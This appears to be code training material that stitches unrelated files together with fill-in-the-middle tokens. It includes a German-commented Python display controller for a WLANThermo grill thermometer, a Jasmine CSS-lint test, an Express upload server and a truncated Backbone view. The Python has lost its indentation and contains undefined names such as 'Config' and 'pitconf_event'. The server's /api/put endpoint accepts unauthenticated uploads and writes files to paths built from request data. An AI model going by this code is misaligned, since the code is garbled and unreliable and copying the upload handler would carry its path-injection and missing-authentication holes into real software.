os.fsync(fw.fileno())
fw.close()
os.rename(name + '_tmp', name)
except IndexError:
time.sleep(0.1)
continue
break
def set_tempflag():
# Flag Datei für WebGUI anlegen
open('/var/www/tmp/flag', 'w').close()
def channels_setvalues(channel, high= None, low=None, sensor=None):
global configfile, configfile_lock
restart_comp = False
temp_changed = False
with configfile_lock:
newconfig = ConfigParser.SafeConfigParser()
newconfig.read(configfile)
if low != None:
newconfig.set('temp_min','temp_min' + str(channel), str(low))
temp_changed = True
if high != None:
newconfig.set('temp_max','temp_max' + str(channel), str(high))
temp_changed = True
if sensor != None:
newconfig.set('Sensoren','ch' + str(channel), str(sensor))
restart_comp = True
if restart_comp:
newconfig.set('ToDo','restart_thermo', 'True')
elif temp_changed:
tempcsv_write(newconfig)
if temp_changed:
set_tempflag()
config_write(configfile, newconfig)
def display_getvalues():
global configfile, configfile_lock
defaults = {'dim':'90', 'timeout':'30', 'start_page':'main', 'serialdevice':'/dev/ttyAMA0', 'serialspeed':'9600'}
display = {}
with configfile_lock:
config = ConfigParser.SafeConfigParser(defaults)
config.read(configfile)
display['dim'] = config.getint('Display','dim')
display['timeout'] = config.getint('Display','timeout')
display['start_page'] = config.get('Display','start_page')
display['serialdevice'] = Config.get('Display', 'serialdevice')
display['serialspeed'] = Config.getint('Display', 'serialspeed')
return display
def display_setvalues(dim = None, timeout = None):
global configfile, configfile_lock
with configfile_lock:
newconfig = ConfigParser.SafeConfigParser()
newconfig.read(configfile)
if dim != None:
newconfig.set('Display','dim', str(dim))
if timeout != None:
newconfig.set('Display','timeout', str(timeout))
config_write(configfile, newconfig)
def todo_setvalues(pi_down = None, pi_reboot = None):
global configfile, configfile_lock
with configfile_lock:
newconfig = ConfigParser.SafeConfigParser()
newconfig.read(configfile)
if pi_down != None:
newconfig.set('ToDo','raspi_shutdown', ['False', 'True'][pi_down])
if pi_reboot != None:
newconfig.set('ToDo','raspi_reboot', ['False', 'True'][pi_reboot])
config_write(configfile, newconfig)
def pitmaster_setvalues(pit_ch = None, pit_set = None, pit_lid= None, pit_on = None, pit_pid = None, pit_type = None, pit_inverted = None):
global configfile, configfile_lock
with configfile_lock:
newconfig = ConfigParser.SafeConfigParser()
newconfig.read(configfile)
if pit_ch != None:
newconfig.set('Pitmaster','pit_ch', str(pit_ch))
if pit_inverted != None:
newconfig.set('Pitmaster','pit_inverted', ['False', 'True'][pit_inverted])
if pit_set != None:
newconfig.set('Pitmaster','pit_set', str(pit_set))
if pit_lid != None:
newconfig.set('Pitmaster','pit_open_lid_detection', ['False', 'True'][pit_lid])
if pit_on != None:
newconfig.set('ToDo','pit_on', ['False', 'True'][pit_on])
if pit_pid != None:
newconfig.set('Pitmaster','pit_controller_type', ['False', 'PID'][pit_pid])
if pit_type != None:
newconfig.set('Pitmaster','pit_type', ['fan', 'servo', 'io', 'io_pwm', 'fan_pwm'][pit_type])
config_write(configfile, newconfig)
def channels_getvalues():
global logger, configfile, configfile_lock
logger.debug('Lade Kanalkonfiguration aus Logfile')
channels = {}
with configfile_lock:
Config = ConfigParser.SafeConfigParser()
Config.read(configfile)
for i in range(8):
channel = {}
channel['sensor'] = Config.getint('Sensoren', 'ch' + str(i))
channel['logging'] = Config.getboolean('Logging', 'ch' + str(i))
channel['web_alert'] = Config.getboolean('web_alert', 'ch' + str(i))
channel['name'] = Config.get('ch_name', 'ch_name' + str(i))
channel['show'] = Config.getboolean('ch_show', 'ch' + str(i))
channel['temp_min'] = Config.getint('temp_min', 'temp_min' + str(i))
channel['temp_max'] = Config.getint('temp_max', 'temp_max' + str(i))
channels[i] = channel
return channels
def pitmaster_config_getvalues():
global configfile, configfile_lock
pitconf = dict()
with configfile_lock:
Config = ConfigParser.SafeConfigParser()
Config.read(configfile)
pitconf['on'] = Config.getboolean('ToDo','pit_on')
pitconf['type'] = Config.get('Pitmaster','pit_type')
pitconf['inverted'] = Config.getboolean('Pitmaster','pit_inverted')
pitconf['curve'] = Config.get('Pitmaster','pit_curve')
pitconf['set'] = Config.getfloat('Pitmaster','pit_set')
pitconf['ch'] = Config.getint('Pitmaster','pit_ch')
pitconf['pause'] = Config.getfloat('Pitmaster','pit_pause')
pitconf['pwm_min'] = Config.getfloat('Pitmaster','pit_pwm_min')
pitconf['pwm_max'] = Config.getfloat('Pitmaster','pit_pwm_max')
pitconf['man'] = Config.getint('Pitmaster','pit_man')
pitconf['Kp'] = Config.getfloat('Pitmaster','pit_kp')
pitconf['Kd'] = Config.getfloat('Pitmaster','pit_kd')
pitconf['Ki'] = Config.getfloat('Pitmaster','pit_ki')
pitconf['Kp_a'] = Config.getfloat('Pitmaster','pit_kp_a')
pitconf['Kd_a'] = Config.getfloat('Pitmaster','pit_kd_a')
pitconf['Ki_a'] = Config.getfloat('Pitmaster','pit_ki_a')
pitconf['switch_a'] = Config.getfloat('Pitmaster','pit_switch_a')
pitconf['controller_type'] = Config.get('Pitmaster','pit_controller_type')
pitconf['iterm_min'] = Config.getfloat('Pitmaster','pit_iterm_min')
pitconf['iterm_max'] = Config.getfloat('Pitmaster','pit_iterm_max')
pitconf['open_lid_detection'] = Config.getboolean('Pitmaster','pit_open_lid_detection')
pitconf['open_lid_pause'] = Config.getfloat('Pitmaster','pit_open_lid_pause')
pitconf['open_lid_falling_border'] = Config.getfloat('Pitmaster','pit_open_lid_falling_border')
pitconf['open_lid_rising_border'] = Config.getfloat('Pitmaster','pit_open_lid_rising_border')
return pitconf
def pitmaster_getvalues():
global logger, pitPath, pitFile
temps = dict()
if os.path.isfile(pitPath + '/' + pitFile):
logger.debug("Daten vom Pitmaster zum Anzeigen vorhanden")
fp = open(pitPath + '/' + pitFile).read()
pitmaster_raw = fp.split(';',4)
# Es trägt sich zu, das im Lande WLANThermo manchmal nix im Pitmaster File steht
# Dann einfach munter so tun als ob einfach nix da ist
#TODO Fix everything
if pitmaster_raw[0] == '':
return None
timestamp = time.mktime(time.strptime(pitmaster_raw[0],'%d.%m.%y %H:%M:%S'))
pitmaster = {'timestamp': timestamp, 'set': float(pitmaster_raw[1]), 'now': float(pitmaster_raw[2]),'new': float(pitmaster_raw[3].rstrip('%')),'msg': pitmaster_raw[4]}
else:
return None
return pitmaster
def lan_getvalues():
interfacelist = ['eth0', 'eth1', 'wlan0', 'wlan1']
interfaces = dict()
for interface in interfacelist:
retvalue = os.popen("LANG=C ifconfig " + interface + " 2>/dev/null | grep 'inet ' | cut -d':' -f2| cut -d' ' -f1").readlines()
if (len(retvalue)!=0):
interfaces[interface] = {'name': interface, 'ip': retvalue[0].strip()}
return interfaces
def wlan_getsignal(interface):
logger.debug('Hole Signalstärke für "' + interface + '"')
retvalue = os.popen("LANG=C iwconfig " + interface + " 2>/dev/null").readlines()
for line in retvalue:
if 'Link Quality=' in line:
quality = re.match('.*Link Quality=(\S*)',line).group(1)
if '/' in quality:
(val, div) = quality.split('/')
quality = int(round(float(val) / float(div) * 100.0))
return quality
return None
def wlan_getssids():
ssidlist = os.popen("iwlist wlan0 scan").readlines()
ssids = list()
for line in ssidlist:
if "ESSID:" in line:
ssid = re.match('.*ESSID:"(.*)"',line).group(1)
if not ssid in ssids:
ssids.append(ssid)
return ssids
def wlan_reconnect():
os.system('ifdown wlan0')
time.sleep(1)
os.system('ifup wlan0')
def wlan_setpassphrase(ssid, psk):
logger.debug('Setze WPA Passhrase für: ' + ssid)
fw = file('/etc/wpa_supplicant/wpa_supplicant.conf').readlines()
ssids = list()
psks = list()
ssid_found = False
for line in fw:
if re.search(r'SSID',line,re.IGNORECASE):
ssids.append(line.split("=")[1].replace('"','').strip())
elif re.search(r'\#psk',line,re.IGNORECASE):
psks.append(line.split("=")[1].replace('"','').strip())
wpa_file = open('/etc/wpa_supplicant/wpa_supplicant.conf' + '_tmp', 'w')
wpa_file.write('ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev\n')
wpa_file.write('update_config=1\n')
if ssids:
for i in range(len(ssids)):
logger.debug('Schreibe wpa_supplicant.conf für: ' + ssids[i])
if ssid == ssids[i]:
# Wert verändert
logger.debug('SSID bereits in Config, PSK ändern')
wpa_passphrase = subprocess.Popen(("/usr/bin/wpa_passphrase", str(ssid), str(psk)), stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.readlines()
ssid_found = True
else:
# neue SSID
logger.debug('SSID und PSK aus alter Datei übernommen')
wpa_passphrase = subprocess.Popen(("/usr/bin/wpa_passphrase", str(ssids[i]), str(psks[i])), stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.readlines()
if wpa_passphrase[0] != "Passphrase must be 8..63 characters":
for line in wpa_passphrase:
wpa_file.write(line)
else:
logger.warning('Neuer PSK zu kurz für SSID: ' + ssid)
if not ssid_found:
# SSID nicht in konfigurierten WLANs, das neue hinzufügen
logger.debug('Schreibe wpa_supplicant.conf für: ' + ssid)
wpa_passphrase = subprocess.Popen(("/usr/bin/wpa_passphrase", str(ssid), str(psk)), stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.readlines()
if wpa_passphrase[0] != "Passphrase must be 8..63 characters":
for line in wpa_passphrase:
wpa_file.write(line)
else:
logger.warning('Neuer PSK zu kurz für SSID: ' + ssid)
wpa_file.flush()
os.fsync(wpa_file.fileno())
wpa_file.close()
os.rename('/etc/wpa_supplicant/wpa_supplicant.conf' + '_tmp', '/etc/wpa_supplicant/wpa_supplicant.conf')
return True
def alert_setack():
try:
os.mknod('/var/www/alert.ack')
except OSError:
pass
def NX_display():
logger.info('Display-Thread gestartet')
global NX_page, NX_channel, stop_event, NX_eventq
global temps_event, channels_event, pitmaster_event, pitmasterconfig_event
global Config
# Version des Displays prüfen
display_version = str(NX_getvalue('main.version.txt'))
logger.info('Version auf dem Display: ' + str(display_version))
if not str(display_version) in ['v1.3']:
logger.info('Update des Displays notwendig')
NX_sendcmd('page update')
open('/var/www/tmp/nextionupdate', 'w').close()
stop_event.wait()
return False
if os.path.isfile('/var/www/tmp/nextionupdate'):
# Update-Flag löschen wenn Version i.O.
os.unlink('/var/www/tmp/nextionupdate')
NX_sendvalues({'boot.text.txt:35':'Temperaturen werden geladen'})
NX_switchpage('boot')
# Werte initialisieren
temps_event.clear()
channels_event.clear()
logger.debug('Hole Temperaturen...')
temps = temp_getvalues()
while temps == None:
logger.info("Wartet auf Temperaturen")
temps_event.wait(0.1)
temps = temp_getvalues()
NX_sendvalues({'boot.text.txt:35':'Konfiguration wird geladen'})
logger.debug('Hole Displaykonfiguration...')
display = display_getvalues()
logger.debug('Hole Sensorkonfiguration...')
sensors = sensors_getvalues()
logger.debug('Hole Kanalkonfiguration...')
channels = channels_getvalues()
logger.debug('Hole Pitmasterkonfiguration...')
pitconf = pitmaster_config_getvalues()
interfaces = lan_getvalues()
# Leere Liste da der Scan etwas dauert...
ssids = []
# Zahl des aktuell gewählen Eintrages
ssids_i = 0
pitmaster = None
if pitconf['on'] == True:
logger.debug('Hole Pitmasterdaten...')
pitmaster = pitmaster_getvalues()
# Kann ein wenig dauern, bis valide Daten geliefert werden, daher nicht mehr warten
if pitmaster == None:
pitmaster = {'timestamp': 0, 'set': 0, 'now': 0,'new': 0,'msg': ''}
values = dict()
for i in range(1, 11):
values['main.sensor_name' + str(i) + '.txt:10'] = sensors[i]['name']
for i in range(8):
if temps[i]['value'] == '999.9':
values['main.kanal' + str(i) + '.txt:10'] = channels[i]['name']
else:
values['main.kanal' + str(i) + '.txt:10'] = temps[i]['value']
values['main.alert' + str(i) + '.txt:10'] = temps[i]['alert']
values['main.al' + str(i) + 'minist.txt:10'] = int(round(channels[i]['temp_min']))
values['main.al' + str(i) + 'maxist.txt:10'] = int(round(channels[i]['temp_max']))
values['main.sensor_type' + str(i) + '.val'] = channels[i]['sensor']
values['main.name' + str(i) + '.txt:10'] = channels[i]['name']
for interface in interfaces:
values['wlaninfo.' + interfaces[interface]['name'] + '.txt:20'] = interfaces[interface]['ip']
values['main.pit_ch.val'] = int(pitconf['ch'])
values['main.pit_power.val'] = int(round(pitmaster['new']))
values['main.pit_set.txt:10'] = round(pitconf['set'],1)
values['main.pit_lid.val'] = int(pitconf['open_lid_detection'])
values['main.pit_on.val'] = int(pitconf['on'])
values['main.pit_inverted.val'] = int(pitconf['inverted'])
values['main.pit_pid.val'] = {'False': 0, 'PID': 1}[pitconf['controller_type']]
# Displayeinstellungen sollten lokal sein und nur für uns
# Ansonsten müsste man hier noch mal ran
values['main.dim.val'] = int(display['dim'])
values['main.timeout.val'] = int(display['timeout'])
# NX_sendcmd('dims=' + str(values['main.dim.val']))
# NX_sendcmd('thsp=' + str(values['main.timeout.val']))
pit_types = {'fan':0, 'servo':1, 'io':2, 'io_pwm':3, 'fan_pwm':4}
values['main.pit_type.val'] = pit_types[pitconf['type']]
NX_sendvalues({'boot.text.txt:35':'Werte werden uebertragen'})
NX_sendvalues(values)
# Ruft die Startseite auf, vorher Text zurücksetzen
NX_sendvalues({'boot.text.txt:35':'Verbindung wird hergestellt'})
NX_sendcmd('page ' + display['start_page'])
NX_wake_event.set()
while not stop_event.is_set():
# idR werden wir bei einem Sleep hier warten
while not stop_event.is_set() and not NX_wake_event.wait(timeout = 0.01):
pass
if not NX_eventq.empty():
event = NX_eventq.get(False)
# Touchevents werden hier behandelt
if event['type'] == 'current_page' :
NX_page = event['data']['page']
elif event['type'] == 'startup':
# Restart des Displays - sterben und auf Wiedergeburt hoffen
logger.warning('Start-Up Meldung vom Display erhalten, breche ab.')
return False
elif event['type'] == 'read_cmd':
if event['data']['area'] == 0:
channel = event['data']['id']
low = NX_getvalue('main.al'+ str(channel)+'minist.txt')
channels_setvalues(channel, low=low)
elif event['data']['area'] == 1:
channel = event['data']['id']
high = NX_getvalue('main.al'+ str(channel)+'maxist.txt')
channels_setvalues(channel, high=high)
elif event['data']['area'] == 2:
channel = event['data']['id']
sensor = NX_getvalue('main.sensor_type'+ str(channel) + '.val')
channels_setvalues(channel, sensor=sensor)
elif event['data']['area'] == 3:
if event['data']['id'] == 0:
# pit_ch
pit_ch = NX_getvalue('main.pit_ch.val')
pitmaster_setvalues(pit_ch = pit_ch)
elif event['data']['id'] == 1:
# pit_set
pit_set = NX_getvalue('main.pit_set.txt')
pitmaster_setvalues(pit_set = pit_set)
elif event['data']['id'] == 2:
# pit_lid
pit_lid = NX_getvalue('main.pit_lid.val')
pitmaster_setvalues(pit_lid = pit_lid)
elif event['data']['id'] == 3:
# pit_on
pit_on = NX_getvalue('main.pit_on.val')
pitmaster_setvalues(pit_on = pit_on)
elif event['data']['id'] == 4:
# pit_pid
pit_pid = NX_getvalue('main.pit_pid.val')
pitmaster_setvalues(pit_pid = pit_pid)
elif event['data']['id'] == 5:
# pit_type
pit_type = NX_getvalue('main.pit_type.val')
pitmaster_setvalues(pit_type = pit_type)
elif event['data']['id'] == 6:
# pit_inverted
pit_inverted = NX_getvalue('main.pit_inverted.val')
pitmaster_setvalues(pit_inverted = pit_inverted)
elif event['data']['area'] == 4:
if event['data']['id'] == 0:
# dim
dim = NX_getvalue('main.dim.val')
display_setvalues(dim = dim)
elif event['data']['id'] == 1:
# timeout
timeout = NX_getvalue('main.timeout.val')
display_setvalues(timeout = timeout)
elif event['data']['area'] == 5:
if event['data']['id'] == 0:
# pi_down
# pi_down = NX_getvalue('main.pi_down.val')
todo_setvalues(pi_down = 1)
elif event['data']['id'] == 1:
# pi_reboot
# pi_reboot = NX_getvalue('main.pi_reboot.val')
todo_setvalues(pi_reboot = 1)
elif event['data']['id'] == 4:
# main.password.txt = WLAN konfigurieren
passphrase = wlan_setpassphrase(ssids[ssids_i], NX_getvalue('main.password.txt'))
wlan_reconnect()
# Sleepmode deaktivierne
# NX_sendcmd('thsp=0')
# 20s auf Verbindung warten
i = 0
while i in range(45) and not stop_event.is_set():
interfaces = lan_getvalues()
if 'wlan0' in interfaces:
# wlan0 hat eine IP-Adresse
NX_sendvalues({'main.result.txt:20': 'IP:' + interfaces['wlan0']['ip']})
NX_sendcmd('page result')
for interface in interfaces:
values['wlaninfo.' + interfaces[interface]['name'] + '.txt:20'] = interfaces[interface]['ip']
NX_sendvalues(values)
break
elif i == 44:
# wlan0 hat nach 20s noch keine IP-Adresse
NX_sendvalues({'main.result.txt:20': 'fehlgeschlagen'})
NX_sendcmd('page result')
break
else:
time.sleep(1)
i = i + 1
# NX_sendcmd('thsp=' + str(Config.getint('Display', 'timeout')))
elif event['data']['id'] == 5:
values = dict()
interfaces = lan_getvalues()
for interface in interfaces:
values['wlaninfo.' + interfaces[interface]['name'] + '.txt:20'] = interfaces[interface]['ip']
signal = wlan_getsignal('wlan0')
values['main.signal.val'] = signal
NX_sendvalues(values)
elif event['data']['id'] == 6:
wlan_reconnect()
elif event['type'] == 'custom_cmd':
if event['data']['area'] == 5:
if event['data']['id'] == 0:
if event['data']['action'] == 0:
logger.debug('Fahre herunter...')
todo_setvalues(pi_down = 1)
elif event['data']['id'] == 1:
if event['data']['action'] == 0:
logger.debug('Starte neu...')
todo_setvalues(pi_reboot = 1)
elif event['data']['id'] == 3:
if event['data']['action'] == 0:
# WLAN scannen
logger.debug('Scanne WLANs')
ssids = wlan_getssids()
ssids_i = 0
logger.debug('SSIDs:' + str(ssids))
if not ssids:
NX_sendvalues({'main.ssid.txt:35': 'Kein WLAN'})
NX_sendcmd('page setup')
else:
NX_sendvalues({'main.ssid.txt:35': ssids[ssids_i]})
NX_sendcmd('page ssidselect')
elif event['data']['action'] == 1:
# voherige SSID
if ssids_i <= 0:
ssids_i = len(ssids)-1
else:
ssids_i = ssids_i - 1
NX_sendvalues({'main.ssid.txt:35': ssids[ssids_i]})
elif event['data']['action'] == 2:
# nächste SSID
if ssids_i >= len(ssids)-1:
ssids_i = 0
else:
ssids_i = ssids_i + 1
NX_sendvalues({'main.ssid.txt:35': ssids[ssids_i]})
elif event['data']['area'] == 6:
if event['data']['id'] == 0:
if event['data']['action'] == 0:
logger.debug('Alarm bestätigt!')
alert_setack()
NX_eventq.task_done()
elif temps_event.is_set():
logger.debug('Temperatur Event')
values = dict()
new_temps = temp_getvalues()
if new_temps != None:
temps_event.clear()
for i in range(8):
if temps[i]['value'] != new_temps[i]['value']:
if new_temps[i]['value'] == '999.9':
values['main.kanal' + str(i) + '.txt:10'] = channels[i]['name']
else:
values['main.kanal' + str(i) + '.txt:10'] = new_temps[i]['value']
if temps[i]['alert'] != new_temps[i]['alert']:
values['main.alert' + str(i) + '.txt:10'] = new_temps[i]['alert']
if NX_sendvalues(values):
temps = new_temps
else:
# Im Fehlerfall später wiederholen
temps_event.set()
elif pitconf_event.is_set():
logger.debug('Pitmasterkonfiguration Event')
values = dict()
pitconf_event.clear()
new_pitconf = pitmaster_config_getvalues()
if pitconf['set'] != new_pitconf['set']:
values['main.pit_set.txt:10'] = round(new_pitconf['set'],1)
if pitconf['ch'] != new_pitconf['ch']:
values['main.pit_ch.val'] = int(new_pitconf['ch'])
if pitconf['open_lid_detection'] != new_pitconf['open_lid_detection']:
values['main.pit_lid.val'] = int(new_pitconf['open_lid_detection'])
if pitconf['inverted'] != new_pitconf['inverted']:
values['main.pit_inverted.val'] = int(new_pitconf['inverted'])
if pitconf['on'] != new_pitconf['on']:
values['main.pit_on.val'] = int(new_pitconf['on'])
if not new_pitconf['on']:
values['main.pit_power.val'] = 0
if pitconf['controller_type'] != new_pitconf['controller_type']:
values['main.pit_pid.val'] = {'False': 0, 'PID': 1}[new_pitconf['controller_type']]
if pitconf['type'] != new_pitconf['type']:
values['main.pit_type.val'] = pit_types[new_pitconf['type']]
if NX_sendvalues(values):
pitconf = new_pitconf
else:
# Im Fehlerfall später wiederholen
pitconf_event.set()
elif pitmaster_event.is_set():
logger.debug('Pitmaster Event')
values = dict()
pitmaster_event.clear()
new_pitmaster = pitmaster_getvalues()
if new_pitmaster != None:
if pitmaster['new'] != new_pitmaster['new']:
if pitconf['on']:
# Wenn Pitmaster aus, 0-Wert senden.
values['main.pit_power.val'] = int(round(float(new_pitmaster['new'])))
else:
values['main.pit_power.val'] = 0
if NX_sendvalues(values):
pitmaster = new_pitmaster
else:
# Im Fehlerfall später wiederholen
pitmaster_event.set()
elif channels_event.is_set():
logger.debug('Channels Event')
values = dict()
channels_event.clear()
new_channels = channels_getvalues()
for i in range(8):
if channels[i]['temp_min'] != new_channels[i]['temp_min']:
values['main.al' + str(i) + 'minist.txt:10'] = new_channels[i]['temp_min']
if channels[i]['temp_max'] != new_channels[i]['temp_max']:
values['main.al' + str(i) + 'maxist.txt:10'] = new_channels[i]['temp_max']
if channels[i]['sensor'] != new_channels[i]['sensor']:
values['main.sensor_type' + str(i) + '.val'] = new_channels[i]['sensor']
if channels[i]['name'] != new_channels[i]['name']:
values['main.name' + str(i) + '.txt:10'] = new_channels[i]['name']
                    if temps[i]['value'] == '999.9':
values['main.kanal' + str(i) + '.txt:10'] = new_channels[i]['name']
if NX_sendvalues(values):
channels = new_channels
else:
# Im Fehlerfall später wiederholen
channels_event.set()
else:
time.sleep(0.01)
logger.info('Display-Thread gestoppt')
return True
def config_write(configfile, config):
# Schreibt das Configfile
# Ein Lock sollte im aufrufenden Programm gehalten werden!
with open(configfile + '_tmp', 'w') as new_ini:
for section_name in config.sections():
new_ini.write('[' + section_name + ']\n')
for (key, value) in config.items(section_name):
new_ini.write(str(key) + ' = ' + str(value) + '\n')
new_ini.write('\n')
new_ini.flush()
os.fsync(new_ini.fileno())
new_ini.close()
os.rename(configfile + '_tmp', configfile)
def raise_keyboard(signum, frame):
raise KeyboardInterrupt('Received SIGTERM')
def check_pid(pid):
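    # Signal 0 performs error checking only: it tests whether the PID exists
    # without actually delivering a signal.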
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
# Here we go
logger.info('Nextion display started!')
logger.debug('Script version: ' + version)
# Read in the software version
for line in open('/var/www/header.php'):
if 'webGUIversion' in line:
build = re.match(r'.*=\s*"(.*)"', line).group(1)
break
# Check whether the service is already running
pid = str(os.getpid())
pidfilename = '/var/run/'+os.path.basename(__file__).split('.')[0]+'.pid'
if os.access(pidfilename, os.F_OK):
pidfile = open(pidfilename, "r")
pidfile.seek(0)
old_pid = int(pidfile.readline())
if check_pid(old_pid):
print("%s existiert, Prozess läuft bereits, beende Skript" % pidfilename)
logger.error("%s existiert, Prozess läuft bereits, beende Skript" % pidfilename)
sys.exit()
else:
logger.info("%s existiert, Prozess läuft nicht, setze Ausführung fort" % pidfilename)
pidfile.seek(0)
open(pidfilename, 'w').write(pid)
else:
logger.debug("%s geschrieben" % pidfilename)
open(pidfilename, 'w').write(pid)
# Display initialisieren
logger.debug('Loading display configuration')
display = display_getvalues()
logger.debug('Opening serial port: ' + display['serialdevice'])
ser = serial.Serial()
logger.debug('Initializing display, baud rate: ' + str(display['serialspeed']))
if NX_init(display['serialdevice'], display['serialspeed']):
logger.debug('Initialization OK')
signal.signal(signal.SIGTERM, raise_keyboard)
logger.debug('Starting reader thread')
NX_reader_thread = threading.Thread(target=NX_reader)
NX_reader_thread.daemon = True
NX_reader_thread.start()
logger.debug('Starting display thread')
NX_display_thread = threading.Thread(target=NX_display)
NX_display_thread.daemon = True
NX_display_thread.start()
logger.debug('Starting file monitoring')
wm = pyinotify.WatchManager()
mask = pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MOVED_TO
notifier = pyinotify.ThreadedNotifier(wm, FileEvent())
notifier.start()
wdd = wm.add_watch(curPath, mask)
wdd2 = wm.add_watch(pitPath, mask)
wdd3 = wm.add_watch(confPath, mask)
try:
while True:
# Main loop
if not NX_display_thread.is_alive():
break
if not NX_reader_thread.is_alive():
break
time.sleep(0.5)
except KeyboardInterrupt:
if not NX_wake_event.is_set():
NX_sendcmd('sleep=0')
time.sleep(0.2)
NX_sendvalues({'boot.nextion_down.val': 1})
NX_switchpage('boot')
logger.debug('Sending stop signal to all threads')
notifier.stop()
# Signal the threads to stop
stop_event.set()
logger.debug('Waiting for threads...')
# Wait for the threads
NX_display_thread.join()
NX_reader_thread.join()
else:
logger.error('No connection to the Nextion display')
# Perhaps the software is not yet installed on the display
open('/var/www/tmp/nextionupdate', 'w').close()
logger.info('Display stopped!')
logging.shutdown()
os.unlink(pidfilename)<|fim▁end|> | |
<|file_name|>test4_grunt_spec.js<|end_file_name|><|fim▁begin|>'use strict';
var _ = require("lodash-node")
,parserlib = require("parserlib") // for linting CSS
,fse = require("fs-extra")
,cwd = process.cwd()
describe("test 4 - check css is valid", function() {
var originalTimeout;
beforeEach(function() {
originalTimeout = jasmine.DEFAULT_TIMEOUT_INTERVAL;
jasmine.DEFAULT_TIMEOUT_INTERVAL = 4000;
});
afterEach(function() {
jasmine.DEFAULT_TIMEOUT_INTERVAL = originalTimeout;
});
/**
* Lodash template used just for converting path vars
*/
var rootDirObj = { rootDir: "./" }
,config = require("./grunt_configs/test4.js").test
,DEST = _.template( config.dest, rootDirObj );
it("should have created a css file for icons which should no longer contains any template syntax, then lint the styles.", function(done) {
expect( fse.existsSync(DEST+"icons.css") ).toBe( true );
var css = fse.readFileSync(DEST+"icons.css").toString();
expect( css.indexOf("<%=") ).toEqual(-1);
lintCSS( done, css );
});
it("should have copied the `svgloader.js` file into dist.", function() {
expect( fse.existsSync(DEST+"svgloader.js") ).toBe( true );
});
it("should have NOT generated sprite and placed it into dist.", function() {
expect( fse.existsSync(DEST + "sprite.png") ).toBe( false );<|fim▁hole|>});
function lintCSS( done, returnedStr ) {
// Now we lint the CSS
var parser = new parserlib.css.Parser();
// will get changed to true in error handler if errors detected
var errorsFound = false;
parser.addListener("error", function(event){
console.log("Parse error: " + event.message + " (" + event.line + "," + event.col + ")", "error");
errorsFound = true;
});
parser.addListener("endstylesheet", function(){
console.log("Finished parsing style sheet");
expect( errorsFound ).toBe( false );
// finish the test
done();
});
parser.parse( returnedStr );
}<|fim▁end|> | });
|
<|file_name|>sky.js<|end_file_name|><|fim▁begin|>var fs = require('fs');
var mysql = require('mysql');
var qs = require('querystring');
var express = require('express');
var config = JSON.parse(fs.readFileSync(__dirname+'/config.json', 'UTF-8'));
// -----------------------------------------------------------------------------
// Keep a persistent connection to the database (reconnect after an error or disconnect)
// -----------------------------------------------------------------------------
if (typeof config.databaseConnection == 'undefined' || typeof config.databaseConnection.retryMinTimeout == 'undefined')
config.databaseConnection = {retryMinTimeout: 2000, retryMaxTimeout: 60000};
var connection, retryTimeout = config.databaseConnection.retryMinTimeout;
function persistantConnection(){
connection = mysql.createConnection(config.database);
connection.connect(
function (err){
if (err){
console.log('Error connecting to database: '+err.code);
setTimeout(persistantConnection, retryTimeout);
console.log('Retrying in '+(retryTimeout / 1000)+' seconds');
if (retryTimeout < config.databaseConnection.retryMaxTimeout)
retryTimeout += 1000;
}
else{
retryTimeout = config.databaseConnection.retryMinTimeout;
console.log('Connected to database');
}
});
connection.on('error',
function (err){
console.log('Database error: '+err.code);
if (err.code === 'PROTOCOL_CONNECTION_LOST')
persistantConnection();
});
}
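// The reconnect delay above grows linearly (+1s per failed attempt) up to
// retryMaxTimeout. A hypothetical exponential backoff variant (not used here)
// would replace the increment with:
//   retryTimeout = Math.min(retryTimeout * 2, config.databaseConnection.retryMaxTimeout);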
//persistantConnection();
var app = express();
// -----------------------------------------------------------------------------
// Deliver the base template of SPA
// -----------------------------------------------------------------------------
app.get('/', function (req, res){
res.send(loadTemplatePart('base.html', req));
});
app.get('/images/:id', function (req, res){
res.send(dataStore.images);
});
// -----------------------------------------------------------------------------
// Deliver static assets
// -----------------------------------------------------------------------------
app.use('/static/', express.static('static'));
// ==================================================
// Below this point are URIs that are accesible from outside, in REST API calls
// ==================================================
app.use(function(req, res, next){
res.header("Access-Control-Allow-Origin", "*");
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept");
next();
});
// -----------------------------------------------------------------------------
// API Endpoint to receive data
// -----------------------------------------------------------------------------
var dataStore = {};
app.post('/api/put', function (req, res){
// Needs to authenticate the RPi module
//
handlePost(req, function(data){
//console.log(data);
for (var i = 0; i < 4; i++){
//var img = Buffer.from(, 'base64');
fs.writeFile('./static/images/'+data.id+'/'+i+'.png',
'data:image/png;base64,'+data.images[i],
function(err){
if (err)
console.log(err);
}
);
}
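// Caution: the loop above writes the 'data:image/png;base64,...' string
// verbatim, so the .png files contain text rather than decoded image bytes.
// A sketch of decoding instead (assuming data.images[i] holds plain base64
// without the data: prefix):
//   fs.writeFile('./static/images/' + data.id + '/' + i + '.png',
//       Buffer.from(data.images[i], 'base64'),
//       function (err) { if (err) console.log(err); });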
//<|fim▁hole|>});
app.listen(config.listenPort, function (){
console.log('RainCatcher server is listening on port '+config.listenPort);
});
// --------------------------------------------------------------------------
// Handler for multipart POST request/response body
function handlePost(req, callback){
var body = '';
req.on('data', function (data){
body += data;
if (body.length > 1e8)
req.connection.destroy();
});
req.on('end', function (data){
var post = body;
try{
post = JSON.parse(post);
}
catch(e){
try{
post = qs.parse(post);
}
catch(e){}
}
callback(post);
});
}
function loadTemplatePart(template, req){
try{
return fs.readFileSync('./templates/'+template, 'utf8');
}
catch(e){
return '<h2>Page Not Found</h2>';
}
}
Date.prototype.sqlFormatted = function() {
var yyyy = this.getFullYear().toString();
var mm = (this.getMonth()+1).toString();
var dd = this.getDate().toString();
return yyyy +'-'+ (mm[1]?mm:"0"+mm[0]) +'-'+ (dd[1]?dd:"0"+dd[0]);
};
function isset(obj){
return typeof obj != 'undefined';
}<|fim▁end|> | //dataStore[data.id] = data;
dataStore = data;
res.send('ok');
}); |
<|file_name|>nav.js<|end_file_name|><|fim▁begin|>var Backbone = require('backbone'),
$ = require('jquery'),
lang = require('../lang'),
template = require('../templates/nav.hbs')
module.exports = Backbone.View.extend({
events: {
'click .js-nav': 'navigate'<|fim▁hole|> },
initialize: function (options) {
this.$el.html(template({
name: window.app.name,
